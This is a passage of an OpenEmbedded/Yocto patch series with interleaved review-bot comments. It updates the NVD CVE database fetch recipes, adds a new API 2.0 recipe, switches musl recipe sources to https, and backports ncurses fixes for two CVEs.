+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ return
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.note("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
if os.path.exists("{0}-journal".format(db_file)):
# If a journal is present the last update might have been interrupted. In that case,
# just wipe any leftovers and force the DB to be recreated.
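Review bot: The failure branch of `do_fetch` reports the outcome with `bb.note("CVE database update failed")`, whereas the NVD API 2.0 recipe added in this same commit uses `bb.warn` for the identical message. A failed update means the scan keeps running against the previous database, so I would use `bb.warn("CVE database update failed")` here as well. The success test reads more naturally as `if update_db_file(db_tmp_file, d):` than as `== True`. The `try` also catches only `OSError`, so a non-numeric `CVE_DB_UPDATE_INTERVAL` surfaces as a `ValueError` traceback from `int()`. `cleanup_db_download` continues past the end of this hunk.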
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
if os.path.exists(db_file):
os.remove(db_file)
- # Don't refresh the database more than once an hour
- try:
- import time
- if time.time() - os.path.getmtime(db_file) < (60*60):
- return
- except OSError:
- pass
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
- bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
- # Connect to database
- conn = sqlite3.connect(db_file)
- c = conn.cursor()
+def update_db_file(db_tmp_file, d):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ from datetime import date
+ import urllib, gzip, sqlite3
+
+ YEAR_START = 2002
+ cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
- initialize_db(c)
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
total_years = date.today().year + 1 - YEAR_START
for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
+ bb.debug(2, "Updating %d" % year)
ph.update((float(i + 1) / total_years) * 100)
- year_url = BASE_URL + str(year)
+ year_url = (d.getVar('NVDCVE_URL')) + str(year)
meta_url = year_url + ".meta"
json_url = year_url + ".json.gz"
# Retrieve meta last modified date
try:
- response = urllib.request.urlopen(meta_url)
+ response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
- bb.warn("Failed to fetch CVE data (%s)" % e.reason)
- return
+ bb.warn("Failed to fetch CVE data (%s)" % e)
+ import socket
+ result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
+ bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
+ return False
if response:
for l in response.read().decode("utf-8").splitlines():
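Review bot: The diagnostic added to the `except urllib.error.URLError` branch calls `socket.getaddrinfo()` unguarded, and a name-resolution failure, one of the likelier causes of the URLError, raises `socket.gaierror` there, so the task ends in a traceback instead of `return False`. The lookup also hard-codes `nvd.nist.gov` although this commit makes the feed location configurable through `NVDCVE_URL`, so with a mirror the printed addresses would belong to the wrong host. I would guard the lookup and close `conn` before returning, as below. Separately, `import urllib` alone does not guarantee that `urllib.request` and `urllib.error` are loaded, so `import urllib.request, urllib.error` would be safer. `update_db_file` continues beyond this hunk.

```python
            except urllib.error.URLError as e:
                # … unchanged: cve_f.write(...) and bb.warn("Failed to fetch CVE data …") …
                import socket
                try:
                    result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
                    bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
                except OSError as lookup_err:
                    # gaierror is an OSError; resolution failure must not mask the original error
                    bb.warn("Could not resolve nvd.nist.gov (%s)" % lookup_err)
                conn.close()
                return False
```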
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
break
else:
bb.warn("Cannot parse CVE metadata, update failed")
- return
+ return False
# Compare with current db last modified date
- c.execute("select DATE from META where YEAR = ?", (year,))
- meta = c.fetchone()
+ cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
+ meta = cursor.fetchone()
+ cursor.close()
+
if not meta or meta[0] != last_modified:
+ bb.debug(2, "Updating entries")
# Clear products table entries corresponding to current year
- c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,))
+ conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
# Update db with current year json file
try:
- response = urllib.request.urlopen(json_url)
+ response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
if response:
- update_db(c, gzip.decompress(response.read()).decode('utf-8'))
- c.execute("insert or replace into META values (?, ?)", [year, last_modified])
+ update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
+ conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
- return
-
+ return False
+ else:
+ bb.debug(2, "Already up to date (last modified %s)" % last_modified)
# Update success, set the date to cve_check file.
if year == date.today().year:
cve_f.write('CVE database update : %s\n\n' % date.today())
conn.commit()
conn.close()
-}
+ return True
-do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
-def initialize_db(c):
- c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
- SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
- VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
- VERSION_END TEXT, OPERATOR_END TEXT)")
- c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
-def parse_node_and_insert(c, node, cveId):
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
# Parse children node if needed
for child in node.get('children', ()):
- parse_node_and_insert(c, child, cveId)
+ parse_node_and_insert(conn, child, cveId)
def cpe_generator():
for cpe in node.get('cpe_match', ()):
if not cpe['vulnerable']:
return
- cpe23 = cpe['cpe23Uri'].split(':')
+ cpe23 = cpe.get('cpe23Uri')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
vendor = cpe23[3]
product = cpe23[4]
version = cpe23[5]
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
if version != '*' and version != '-':
# Version is defined, this is a '=' match
- yield [cveId, vendor, product, version, '=', '', '']
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
elif version == '-':
# no version information is available
yield [cveId, vendor, product, version, '', '', '']
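Review bot: The new length guard in `cpe_generator` is off by one: `if len(cpe23) < 6: return` lets a six-field string through, and the added `cpe23[6]` access below it then raises `IndexError` on data that comes straight from the downloaded feed. The guard should be `if len(cpe23) < 7:`. The same check is repeated in `parse_node_and_insert` in the new `cve-update-nvd2-native.bb` and needs the same change. It is also worth confirming that `return` is intended for a malformed or non-vulnerable entry: it ends the generator, so the remaining `cpe_match` entries of that node are never inserted, and `continue` would skip only the bad one. The function continues outside this hunk.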
@@ -166,11 +244,16 @@ def parse_node_and_insert(c, node, cveId):
op_end = '<'
v_end = cpe['versionEndExcluding']
- yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
- c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator())
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
-def update_db(c, jsondata):
+def update_db(conn, jsondata):
import json
root = json.loads(jsondata)
@@ -194,15 +277,14 @@ def update_db(c, jsondata):
accessVector = accessVector or "UNKNOWN"
cvssv3 = 0.0
- c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
- [cveId, cveDesc, cvssv2, cvssv3, date, accessVector])
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
configurations = elt['configurations']['nodes']
for config in configurations:
- parse_node_and_insert(c, config, cveId)
+ parse_node_and_insert(conn, config, cveId)
-addtask do_populate_cve_db before do_fetch
-do_populate_cve_db[nostamp] = "1"
+do_fetch[nostamp] = "1"
EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
+SUMMARY = "Updates the NVD CVE database"
+LICENSE = "MIT"
+
+# Important note:
+# This product uses the NVD API but is not endorsed or certified by the NVD.
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+inherit native
+
+deltask do_unpack
+deltask do_patch
+deltask do_configure
+deltask do_compile
+deltask do_install
+deltask do_populate_sysroot
+
+NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
+
+# If you have a NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
+# then setting this to get higher rate limits.
+NVDCVE_API_KEY ?= ""
+
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# CVE database incremental update age threshold, in seconds. If the database is
+# older than this threshold, do a full re-download, else, do an incremental
+# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
+# Use 0 to force a full download.
+CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
+
+# Number of attempts for each http query to nvd server before giving up
+CVE_DB_UPDATE_ATTEMPTS ?= "5"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
+
+python () {
+ if not bb.data.inherits_class("cve-check", d):
+ raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
+}
+
+python do_fetch() {
+ """
+ Update NVD database with API 2.0
+ """
+ import bb.utils
+ import bb.progress
+ import shutil
+
+ bb.utils.export_proxies(d)
+
+ db_file = d.getVar("CVE_CHECK_DB_FILE")
+ db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+ # By default let's update the whole database (since time 0)
+ database_time = 0
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ bb.note("CVE database recently updated, skipping")
+ return
+ database_time = os.path.getmtime(db_file)
+
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d, database_time) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.warn("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
+ if os.path.exists("{0}-journal".format(db_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_file))
+
+ if os.path.exists(db_file):
+ os.remove(db_file)
+
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
+
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
+
+def nvd_request_wait(attempt, min_wait):
+ return min ( ( (2 * attempt) + min_wait ) , 30)
+
+def nvd_request_next(url, attempts, api_key, args, min_wait):
+ """
+ Request next part of the NVD database
+ NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
+ """
+
+ import urllib.request
+ import urllib.parse
+ import gzip
+ import http
+ import time
+
+ request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
+ if api_key:
+ request.add_header("apiKey", api_key)
+ bb.note("Requesting %s" % request.full_url)
+
+ for attempt in range(attempts):
+ try:
+ r = urllib.request.urlopen(request)
+
+ if (r.headers['content-encoding'] == 'gzip'):
+ buf = r.read()
+ raw_data = gzip.decompress(buf).decode("utf-8")
+ else:
+ raw_data = r.read().decode("utf-8")
+
+ r.close()
+
+ except Exception as e:
+ wait_time = nvd_request_wait(attempt, min_wait)
+ bb.note("CVE database: received error (%s)" % (e))
+ bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
+ time.sleep(wait_time)
+ pass
+ else:
+ return raw_data
+ else:
+ # We failed at all attempts
+ return None
+
+def update_db_file(db_tmp_file, d, database_time):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ import datetime
+ import sqlite3
+ import json
+
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
+
+ req_args = {'startIndex' : 0}
+
+ incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
+ if database_time != 0:
+ database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
+ today_date = datetime.datetime.now(tz=datetime.timezone.utc)
+ delta = today_date - database_date
+ if incr_update_threshold == 0:
+ bb.note("CVE database: forced full update")
+ elif delta < datetime.timedelta(seconds=incr_update_threshold):
+ bb.note("CVE database: performing partial update")
+ # The maximum range for time is 120 days
+ if delta > datetime.timedelta(days=120):
+ bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
+ req_args['lastModStartDate'] = database_date.isoformat()
+ req_args['lastModEndDate'] = today_date.isoformat()
+ else:
+ bb.note("CVE database: file too old, forcing a full update")
+ else:
+ bb.note("CVE database: no preexisting database, do a full download")
+
+ with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
+
+ bb.note("Updating entries")
+ index = 0
+ url = d.getVar("NVDCVE_URL")
+ api_key = d.getVar("NVDCVE_API_KEY") or None
+ attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
+
+ # Recommended by NVD
+ wait_time = 6
+ if api_key:
+ wait_time = 2
+
+ while True:
+ req_args['startIndex'] = index
+ raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
+ if raw_data is None:
+ # We haven't managed to download data
+ return False
+
+ data = json.loads(raw_data)
+
+ index = data["startIndex"]
+ total = data["totalResults"]
+ per_page = data["resultsPerPage"]
+ bb.note("Got %d entries" % per_page)
+ for cve in data["vulnerabilities"]:
+ update_db(conn, cve)
+
+ index += per_page
+ ph.update((float(index) / (total+1)) * 100)
+ if index >= total:
+ break
+
+ # Recommended by NVD
+ time.sleep(wait_time)
+
+ # Update success, set the date to cve_check file.
+ cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
+
+ conn.commit()
+ conn.close()
+ return True
+
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
+
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
+
+ def cpe_generator():
+ for cpe in node.get('cpeMatch', ()):
+ if not cpe['vulnerable']:
+ return
+ cpe23 = cpe.get('criteria')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
+ vendor = cpe23[3]
+ product = cpe23[4]
+ version = cpe23[5]
+
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
+ if version != '*' and version != '-':
+ # Version is defined, this is a '=' match
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
+ elif version == '-':
+ # no version information is available
+ yield [cveId, vendor, product, version, '', '', '']
+ else:
+ # Parse start version, end version and operators
+ op_start = ''
+ op_end = ''
+ v_start = ''
+ v_end = ''
+
+ if 'versionStartIncluding' in cpe:
+ op_start = '>='
+ v_start = cpe['versionStartIncluding']
+
+ if 'versionStartExcluding' in cpe:
+ op_start = '>'
+ v_start = cpe['versionStartExcluding']
+
+ if 'versionEndIncluding' in cpe:
+ op_end = '<='
+ v_end = cpe['versionEndIncluding']
+
+ if 'versionEndExcluding' in cpe:
+ op_end = '<'
+ v_end = cpe['versionEndExcluding']
+
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
+
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
+
+def update_db(conn, elt):
+ """
+ Update a single entry in the on-disk database
+ """
+
+ accessVector = None
+ cveId = elt['cve']['id']
+ if elt['cve']['vulnStatus'] == "Rejected":
+ c = conn.cursor()
+ c.execute("delete from PRODUCTS where ID = ?;", [cveId])
+ c.execute("delete from NVD where ID = ?;", [cveId])
+ c.close()
+ return
+ cveDesc = ""
+ for desc in elt['cve']['descriptions']:
+ if desc['lang'] == 'en':
+ cveDesc = desc['value']
+ date = elt['cve']['lastModified']
+ try:
+ accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
+ cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
+ except KeyError:
+ cvssv2 = 0.0
+ cvssv3 = None
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
+ cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
+ cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ accessVector = accessVector or "UNKNOWN"
+ cvssv3 = cvssv3 or 0.0
+
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
+
+ try:
+ # Remove any pre-existing CVE configuration. Even for partial database
+ # update, those will be repopulated. This ensures that old
+ # configuration is not kept for an updated CVE.
+ conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
+ for config in elt['cve']['configurations']:
+ # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
+ for node in config["nodes"]:
+ parse_node_and_insert(conn, node, cveId)
+ except KeyError:
+ bb.note("CVE %s has no configurations" % cveId)
+
+do_fetch[nostamp] = "1"
+
+EXCLUDE_FROM_WORLD = "1"
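Review bot: `nvd_request_next()` calls `urllib.request.urlopen(request)` with no timeout, so a stalled connection to the NVD API can block `do_fetch` indefinitely while it holds `CVE_CHECK_DB_FILE_LOCK`. The JSON-feed recipe changed in this same commit gained `CVE_SOCKET_TIMEOUT` for the equivalent call. I would define the same variable here and pass it down, `r = urllib.request.urlopen(request, timeout=timeout)`. The retry loop also catches bare `Exception` and sleeps once more after the last failed attempt; narrowing it to the network and decode errors would stop it retrying on programming errors. In `update_db_file`, the `return False` path leaves `conn` open, so a `conn.close()` before it would release the temporary database before `do_fetch` removes the file.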
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index ec988f1920..71beb80083 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
PV = "0.10+${SRCPV}"
SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5..74de48c2cd 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
PV = "1.1"
SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce33061..c30509469c 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
PV = "20170421"
SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index 82379fd1c5..cbb56f4769 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
# mirror is at git://github.com/kraj/musl.git
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
"
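Review bot: This `SRC_URI` gains `branch=master` but stays on the unauthenticated `git://` transport, while the three sibling recipes in this commit (libucontext, musl-obstack, musl-utils) are moved to `protocol=https`. With `git://` nothing authenticates the server, so integrity depends on the recipe's pinned revision (not visible in this hunk). If upstream offers an HTTPS clone URL I would switch to it. Otherwise, record the reason next to the existing mirror comment, for example `# upstream serves git:// only here; integrity relies on the pinned SRCREV`.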
diff --git a/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
new file mode 100644
index 0000000000..1eb17767a0
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
@@ -0,0 +1,29 @@
+From 3b3e87934bb6d8511261d7c3d6e39b4f71849272 Mon Sep 17 00:00:00 2001
+From: Nathan Rossi <nathan@nathanrossi.com>
+Date: Mon, 14 Dec 2020 13:39:02 +1000
+Subject: [PATCH] gen-pkgconfig.in: Do not include LDFLAGS in generated pc
+ files
+
+Including the LDFLAGS in the pkgconfig output is problematic as OE
+includes build host specific paths and options (e.g. uninative and
+'-Wl,--dynamic-linker=').
+
+Upstream-Status: Inappropriate [OE Specific]
+Signed-off-by: Nathan Rossi <nathan@nathanrossi.com>
+---
+ misc/gen-pkgconfig.in | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/misc/gen-pkgconfig.in b/misc/gen-pkgconfig.in
+index 8f00b824b9..009d215663 100644
+--- a/misc/gen-pkgconfig.in
++++ b/misc/gen-pkgconfig.in
+@@ -80,7 +80,7 @@ if [ "$includedir" != "/usr/include" ]; then
+ fi
+
+ lib_flags=
+-for opt in -L$libdir @LDFLAGS@ @EXTRA_LDFLAGS@ @LIBS@
++for opt in -L$libdir @LIBS@
+ do
+ case $opt in
+ -l*) # LIBS is handled specially below
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 0000000000..7655200350
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
+$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
+
+Fix for CVE-2021-39537 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
+
+CVE: CVE-2021-39537
+Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
++++ b/ncurses/tinfo/captoinfo.c
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ }
+ break;
+ case '^':
++ len = 2;
+ c = UChar(*++sp);
+- if (c == '?')
++ if (c == '?') {
+ c = 127;
+- else
++ } else if (c == '\0') {
++ len = 1;
++ } else {
+ c &= 0x1f;
+- len = 2;
++ }
+ break;
+ default:
+ c = UChar(*sp);
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
+From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
+From: Dan Tran <dantran@microsoft.com>
+Date: Fri, 13 May 2022 13:28:41 -0700
+Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
+ and segmentation violation in convert_strings in tinfo/read_entry.c in the
+ terminfo library.
+
+CVE: CVE-2022-29458
+Upstream-Status: Backport
+[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
+
+Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
+Signed-off-by: Dan Tran <dantran@microsoft.com>
+---
+ ncurses/tinfo/alloc_entry.c | 14 ++++++--------
+ ncurses/tinfo/read_entry.c | 25 +++++++++++++++++++------
+ 2 files changed, 25 insertions(+), 14 deletions(-)
+
+diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
+index 4bf7d6c8..b49ad6aa 100644
+--- a/ncurses/tinfo/alloc_entry.c
++++ b/ncurses/tinfo/alloc_entry.c
+@@ -48,13 +48,11 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
+
+ #define ABSENT_OFFSET -1
+ #define CANCELLED_OFFSET -2
+
